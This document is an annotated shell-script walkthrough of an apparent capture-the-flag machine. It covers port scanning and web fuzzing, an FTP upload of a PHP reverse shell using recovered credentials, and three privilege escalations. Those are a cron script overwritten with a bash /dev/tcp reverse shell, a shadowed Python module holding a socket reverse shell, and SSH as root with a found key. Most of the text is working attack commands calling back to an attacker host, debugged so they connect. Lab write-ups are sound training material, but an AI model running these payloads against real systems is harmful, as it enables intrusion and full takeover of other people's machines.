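# --- Recon: port scan + web content discovery ----------------------------
# Required env: VICTIM (target host/IP). Fail loudly if it is unset instead
# of scanning "" / localhost with an empty expansion.
: "${VICTIM:?set VICTIM to the target host}"

# Full TCP range, service versions, OS fingerprint (-O needs root), connect
# scan. -oA keeps the results on disk for later reference.
nmap -sV -sT -O -p- -oA "nmap_$VICTIM" "$VICTIM"

# Directory brute force. NOTE(review): this uses an absolute SecLists path
# while the ffuf runs below use a relative one — pick whichever matches the
# attacker box; only one of them can be right.
gobuster dir -u "http://$VICTIM" \
  -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -x php,html,txt

# Parameter fuzzing on post.php?post=. The original grepped "2422" out of a
# results.txt whose origin is not shown; 2422 is presumably the size of the
# default/not-found response (confirm with one unfiltered run), so filter it
# inside ffuf and write the output explicitly.
ffuf -c -u "http://$VICTIM/post.php?post=FUZZ" \
  -w SecLists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt \
  -fs 2422 -o results.txt

# Second pass with a hand-built list (mylist.txt), same size filter.
ffuf -c -u "http://$VICTIM/post.php?post=FUZZ" \
  -w mylist.txt \
  -fs 2422 -o results_mylist.txt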
I also remembered the secret file found earlier; reading it revealed a set of FTP credentials, which are used in the next step.
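# --- Foothold: upload a PHP reverse shell over FTP ------------------------
: "${VICTIM:?set VICTIM to the target host}"
: "${KALI:?set KALI to the attacker IP the shell should call back to}"

# Credentials recovered from the "secret" file read earlier. They are lab
# creds kept in plaintext here; for anything real, read them from a .netrc
# or the environment rather than committing them.
ftp_user=ftpuser
ftp_pass=givemefiles777

# 1. Fetch the pentestmonkey shell and point it at our listener. The stock
#    copy dials 127.0.0.1:1234 — copying it unmodified (as the original did)
#    connects to the victim itself. Port 1234 already matches the nc below.
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
sed -i "s/127\.0\.0\.1/$KALI/" php-reverse-shell.php

# 2. Upload non-interactively instead of typing the Username/Password
#    prompts by hand (-i no prompting, -n no auto-login, -v verbose).
ftp -inv "$VICTIM" <<EOF
user $ftp_user $ftp_pass
binary
put php-reverse-shell.php
bye
EOF

# 3. Listener, started in a second terminal BEFORE triggering the shell.
#    Then request the uploaded file over HTTP (the FTP root is presumably
#    web-served — confirm the path) to get the callback.
nc -lvnp 1234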
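# --- Privesc 1: www-data -> toby via a cron-run script --------------------
: "${KALI:?set KALI to the attacker IP the shell should call back to}"

# Upgrade the nc shell to a real TTY (job control, signals, line editing).
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl-Z to background the shell, then on the attacker terminal:
stty raw -echo; fg

# Look for scheduled jobs; /home/toby/jobs/cow.sh presumably shows up here
# as a cron entry — confirm which user runs it and how often.
cat /etc/crontab
cd /home/toby/jobs/

# www-data can run these commands as toby via sudo (per the original notes),
# so recreate cow.sh as a file we are allowed to fill in. 0777 is broader
# than needed and lets every local user hijack the job as well; it is kept
# only because the original relied on it — tighten it if cron does not need
# the exec bit.
sudo -u toby rm -f cow.sh
sudo -u toby touch cow.sh
sudo -u toby chmod 777 cow.sh

# Payload. The original wrote '$KALI' inside single quotes, which left the
# literal text "$KALI" in cow.sh; cron runs with an almost empty environment,
# so the callback target became /dev/tcp//1338 and never connected. Expand
# the address now with an unquoted heredoc. /dev/tcp and >& are bash-only,
# which the shebang guarantees for the cron run.
cat > cow.sh <<EOF
#!/bin/bash
sh -i >& /dev/tcp/$KALI/1338 0>&1
EOF
# Start `nc -lvnp 1338` on the attacker box and wait for the next cron run.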
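# --- Privesc 2: toby -> will via a writable Python module ------------------
: "${KALI:?set KALI to the attacker IP the shell should call back to}"

# Upgrade the new (toby) shell to a TTY as before.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl-Z to background the shell, then on the attacker terminal:
stty raw -echo; fg

# will_script.py can be run as will via sudo. Dropping cmd.py beside it
# presumably works because the script does `import cmd` and its own
# directory comes first on sys.path, shadowing the stdlib module — confirm
# against the script's imports; also note this writes into mat's home, so
# the directory must be writable by the current user.
cd /home/mat/scripts/

# Same quoting bug as the cron payload: "$KALI" inside single quotes was
# written literally into cmd.py and the connect() could never resolve it.
# The heredoc is unquoted so only $KALI is substituted.
cat > cmd.py <<EOF
import socket,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("$KALI",4242))
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")
EOF

# Start `nc -lvnp 4242` on the attacker box first, then trigger the import.
sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1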
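# --- Privesc 3: will -> root via a recovered SSH private key ---------------
: "${VICTIM:?set VICTIM to the target host}"

# Upgrade the will shell to a TTY as before.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl-Z to background the shell, then on the attacker terminal:
stty raw -echo; fg

# id_rsa: its origin is not shown in these notes (presumably found as will);
# copy its contents to the attacker box before this step. ssh refuses keys
# that are group/world-readable, hence 0600. IdentitiesOnly stops the agent
# from offering other keys first and tripping MaxAuthTries.
chmod 600 id_rsa
ssh -i id_rsa -o IdentitiesOnly=yes "root@$VICTIM"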